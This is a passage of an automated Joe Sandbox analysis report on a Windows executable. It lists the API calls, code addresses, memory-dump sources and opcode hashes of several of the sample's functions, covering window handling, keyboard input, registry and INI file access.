                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                            • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                            • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                                                                            • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                            • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                                                                            APIs
                                                                                                                                                                            • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1795658109-438819550
                                                                                                                                                                            • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                            • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                                                                            • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                              • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                              • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                              • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                              • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                            • GetFocus.USER32 ref: 004609EF
                                                                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                                                                            • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                                                                            • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                            • API String ID: 991886796-1110647743
                                                                                                                                                                            • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                            • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$_sprintf
                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                            • API String ID: 891462717-436463671
                                                                                                                                                                            • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                            • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                                                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LlbpXphTu9.exe,?,C:\Users\user\Desktop\LlbpXphTu9.exe,004A8E80,C:\Users\user\Desktop\LlbpXphTu9.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                            • String ID: $OH$@OH$X
                                                                                                                                                                            • API String ID: 3491138722-1394974532
                                                                                                                                                                            • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                            • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                                                                            • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                            • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2449869053-0
                                                                                                                                                                            • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                            • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                                                                            • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                            • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                                                                            • SendInput.USER32 ref: 0044C509
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3031425849-0
                                                                                                                                                                            • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                            • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                                                                            • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                            • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2095303065-0
                                                                                                                                                                            • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                            • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                            • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                            • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                                                            • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                            • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1822080540-0
                                                                                                                                                                            • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                            • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                                                                            • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                            • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 659298297-0
                                                                                                                                                                            • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                            • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                                                            • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1300944170-0
                                                                                                                                                                            • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                            • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(02F61A68,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(02F61A68,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 142311417-0
                                                                                                                                                                            • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                                                            • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                                                                            • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                                                            • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0044955A
                                                                                                                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                                                                            • _wcslen.LIBCMT ref: 004495C1
                                                                                                                                                                            • _wcslen.LIBCMT ref: 004495CE
                                                                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
